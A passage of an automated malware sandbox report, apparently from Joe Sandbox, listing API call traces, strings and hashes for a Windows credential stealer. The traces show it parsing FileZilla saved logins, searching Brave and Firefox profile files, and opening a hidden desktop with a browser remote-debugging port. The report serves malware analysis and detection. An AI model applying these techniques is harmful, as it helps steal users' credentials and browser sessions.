                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: dcbc23233a10c5ddd50bea4d9b63efbb1d632f708712ee42dcce5dedd271a3c4
                          • Instruction ID: c37467a376ed92290d66cfe95cdcbf24325093d6f7e51a793f313c9dfe7bd842
                          • Opcode Fuzzy Hash: dcbc23233a10c5ddd50bea4d9b63efbb1d632f708712ee42dcce5dedd271a3c4
                          • Instruction Fuzzy Hash: 03525371A25716DBDB21EFA8DC8DA9E77F9AF44300F044624F805A7291DB78EC468F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007060FF
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00706152
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00706185
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007061B5
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007061F0
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00706223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00706233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 48df1ff8d3e5c6ff511ca58cd3a76046c7e347c987a9db59e746112c45a6dece
                          • Instruction ID: f28df97ebb6465c10189c3f8bfba34992ccbc8090d5957031ed0af6db475130a
                          • Opcode Fuzzy Hash: 48df1ff8d3e5c6ff511ca58cd3a76046c7e347c987a9db59e746112c45a6dece
                          • Instruction Fuzzy Hash: 58521072A14215DBDB21EBA8DC5DA9E77F9AF44300F148624F805F7292DB78ED06CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716B9D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716BCD
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716BFD
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00716C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00716C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00716C5A
                          • lstrlen.KERNEL32(00000000), ref: 00716C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00716CE2
                          • lstrlen.KERNEL32(00000000), ref: 00716CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00716D6A
                          • lstrlen.KERNEL32(00000000), ref: 00716D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00716DF2
                          • lstrlen.KERNEL32(00000000), ref: 00716E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00716E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00716EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00716EC9
                          • LocalFree.KERNEL32(00000000), ref: 00716ED4
                          • lstrlen.KERNEL32(?), ref: 00716F6E
                          • lstrlen.KERNEL32(?), ref: 00716F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: bcf11b7d65bc75e4e92497823fad2d5791750de39a820f0fed56cca868185843
                          • Instruction ID: 7da8e0f04e2998fdb68a874fa7e05f8d4a67597f0e903947b333d75d8bd90f86
                          • Opcode Fuzzy Hash: bcf11b7d65bc75e4e92497823fad2d5791750de39a820f0fed56cca868185843
                          • Instruction Fuzzy Hash: 50029471A29215EBCB11ABB8DD8DB9E7BB9AF04700F144514F801E7292DF7CD942DBA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00714B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714B7F
                          • lstrlen.KERNEL32(00734CA8), ref: 00714B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714BA7
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 00714BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00714BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: 491a9bd6444b57782d537a3a2d84157028b2afcc9398d7f90c7809f96a8473db
                          • Instruction ID: 74e6981ad8cdcf37a8c0c9fba3e605f36e2dd0212e43ef92d951be3bee5e3d91
                          • Opcode Fuzzy Hash: 491a9bd6444b57782d537a3a2d84157028b2afcc9398d7f90c7809f96a8473db
                          • Instruction Fuzzy Hash: C9926071A15601CFDB28CF6CC988B99B7E5AF84714F19816DE8099B2E1D779DC82CF80
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00711291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007112B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007112BF
                          • lstrlen.KERNEL32(00734CA8), ref: 007112CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007112E7
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 007112F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0071133A
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071135C
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00711376
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007113AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007113D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007113E2
                          • lstrlen.KERNEL32(00731794), ref: 007113ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071140A
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711416
                          • lstrlen.KERNEL32(?), ref: 00711423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711443
                          • lstrcat.KERNEL32(00000000,?), ref: 00711451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071147A
                          • StrCmpCA.SHLWAPI(?,010DCC38), ref: 007114A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007114E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711535
                          • StrCmpCA.SHLWAPI(?,010DD228), ref: 00711552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711593
                          • lstrcpy.KERNEL32(00000000,?), ref: 007115BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007115E4
                          • StrCmpCA.SHLWAPI(?,010DCED8), ref: 00711602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711633
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711685
                          • StrCmpCA.SHLWAPI(?,010DCDD0), ref: 007116B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007116F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711745
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007117BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007117F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071181C
                          • FindClose.KERNEL32(00000000), ref: 0071182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 6675cd50fa0df0d6b9595f36187f9d5f0b9793696af024e4863c1e42e67bdae3
                          • Instruction ID: bfc8f712363e6bd50bb0d02bf16634d2350a365372676b6c49821e09377b6437
                          • Opcode Fuzzy Hash: 6675cd50fa0df0d6b9595f36187f9d5f0b9793696af024e4863c1e42e67bdae3
                          • Instruction Fuzzy Hash: A7125371625206DBCB25EF78D88DAAE77F8AF44300F444528F946A7291DF38DC458B90
                          APIs
                          • wsprintfA.USER32 ref: 0071CBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 0071CC13
                          • lstrcat.KERNEL32(?,?), ref: 0071CC5F
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071CC71
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0071CC8B
                          • wsprintfA.USER32 ref: 0071CCB0
                          • PathMatchSpecA.SHLWAPI(?,010D88B0), ref: 0071CCE2
                          • CoInitialize.OLE32(00000000), ref: 0071CCEE
                            • Part of subcall function 0071CAE0: CoCreateInstance.COMBASE(0072B110,00000000,00000001,0072B100,?), ref: 0071CB06
                            • Part of subcall function 0071CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0071CB46
                            • Part of subcall function 0071CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0071CBC9
                          • CoUninitialize.COMBASE ref: 0071CD09
                          • lstrcat.KERNEL32(?,?), ref: 0071CD2E
                          • lstrlen.KERNEL32(?), ref: 0071CD3B
                          • StrCmpCA.SHLWAPI(?,0072CFEC), ref: 0071CD55
                          • wsprintfA.USER32 ref: 0071CD7D
                          • wsprintfA.USER32 ref: 0071CD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0071CDB0
                          • wsprintfA.USER32 ref: 0071CDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0071CDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0071CE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 0071CE28
                          • CloseHandle.KERNEL32(00000000), ref: 0071CE33
                          • CloseHandle.KERNEL32(00000000), ref: 0071CE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0071CE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071CE94
                          • FindNextFileA.KERNEL32(?,?), ref: 0071CF8D
                          • FindClose.KERNEL32(?), ref: 0071CF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: 9336a0407e9c63b2a91900ae8b5bbc32de44c86b2f54f685937ac5915c7be21b
                          • Instruction ID: 921a26858742aab2c582a96c28adc2d3724f9c754d850f4729e29aac95251ee2
                          • Opcode Fuzzy Hash: 9336a0407e9c63b2a91900ae8b5bbc32de44c86b2f54f685937ac5915c7be21b
                          • Instruction Fuzzy Hash: FAC16172A10219DFDB25DFA8DC49AEF77B9BF44700F044598F909A7281DE34AA85CF90
                          APIs
                          • memset.MSVCRT ref: 00709790
                          • lstrcat.KERNEL32(?,?), ref: 007097A0
                          • lstrcat.KERNEL32(?,?), ref: 007097B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 007097C3
                          • memset.MSVCRT ref: 007097D7
                            • Part of subcall function 00723E70: lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00723EA5
                            • Part of subcall function 00723E70: lstrcpy.KERNEL32(00000000,010D9D78), ref: 00723ECF
                            • Part of subcall function 00723E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0070134E,?,0000001A), ref: 00723ED9
                          • wsprintfA.USER32 ref: 00709806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00709827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00709844
                            • Part of subcall function 007246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007246B9
                            • Part of subcall function 007246A0: Process32First.KERNEL32(00000000,00000128), ref: 007246C9
                            • Part of subcall function 007246A0: Process32Next.KERNEL32(00000000,00000128), ref: 007246DB
                            • Part of subcall function 007246A0: StrCmpCA.SHLWAPI(?,?), ref: 007246ED
                            • Part of subcall function 007246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00724702
                            • Part of subcall function 007246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00724711
                            • Part of subcall function 007246A0: CloseHandle.KERNEL32(00000000), ref: 00724718
                            • Part of subcall function 007246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00724726
                            • Part of subcall function 007246A0: CloseHandle.KERNEL32(00000000), ref: 00724731
                          • memset.MSVCRT ref: 00709862
                          • lstrcat.KERNEL32(00000000,?), ref: 00709878
                          • lstrcat.KERNEL32(00000000,?), ref: 00709889
                          • lstrcat.KERNEL32(00000000,00734B60), ref: 0070989B
                          • memset.MSVCRT ref: 007098AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007098D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00709903
                          • StrStrA.SHLWAPI(00000000,010DDA08), ref: 00709919
                          • lstrcpyn.KERNEL32(009393D0,00000000,00000000), ref: 00709938
                          • lstrlen.KERNEL32(?), ref: 0070994B
                          • wsprintfA.USER32 ref: 0070995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 00709971
                          • memset.MSVCRT ref: 00709986
                          • Sleep.KERNEL32(00001388), ref: 007099E7
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                            • Part of subcall function 007092B0: strlen.MSVCRT ref: 007092E1
                            • Part of subcall function 007092B0: strlen.MSVCRT ref: 007092FA
                            • Part of subcall function 007092B0: strlen.MSVCRT ref: 00709399
                            • Part of subcall function 007092B0: strlen.MSVCRT ref: 007093E6
                            • Part of subcall function 00724740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00724759
                            • Part of subcall function 00724740: Process32First.KERNEL32(00000000,00000128), ref: 00724769
                            • Part of subcall function 00724740: Process32Next.KERNEL32(00000000,00000128), ref: 0072477B
                            • Part of subcall function 00724740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072479C
                            • Part of subcall function 00724740: TerminateProcess.KERNEL32(00000000,00000000), ref: 007247AB
                            • Part of subcall function 00724740: CloseHandle.KERNEL32(00000000), ref: 007247B2
                            • Part of subcall function 00724740: Process32Next.KERNEL32(00000000,00000128), ref: 007247C0
                            • Part of subcall function 00724740: CloseHandle.KERNEL32(00000000), ref: 007247CB
                          • CloseDesktop.USER32(?), ref: 00709A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 2040986984-1862457068
                          • Opcode ID: a3c102c09e60c9d1d9b99ec76dd0797ca2b5578229fbc19df4fe2a81e50b3120
                          • Instruction ID: ffd46c0a4ee7b30391b9649ab1384d4c088e4c0177237cd1cb11e9461ea7ecda
                          • Opcode Fuzzy Hash: a3c102c09e60c9d1d9b99ec76dd0797ca2b5578229fbc19df4fe2a81e50b3120
                          • Instruction Fuzzy Hash: 519154B1A14218EFDB14DFA4DC89FDE77B9AF48700F108155F609A7191DFB4AA448F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00711291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007112B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007112BF
                          • lstrlen.KERNEL32(00734CA8), ref: 007112CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007112E7
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 007112F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0071133A
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071135C
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00711376
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007113AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007113D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007113E2
                          • lstrlen.KERNEL32(00731794), ref: 007113ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071140A
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711416
                          • lstrlen.KERNEL32(?), ref: 00711423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711443
                          • lstrcat.KERNEL32(00000000,?), ref: 00711451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071147A
                          • StrCmpCA.SHLWAPI(?,010DCC38), ref: 007114A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007114E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711535
                          • StrCmpCA.SHLWAPI(?,010DD228), ref: 00711552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711593
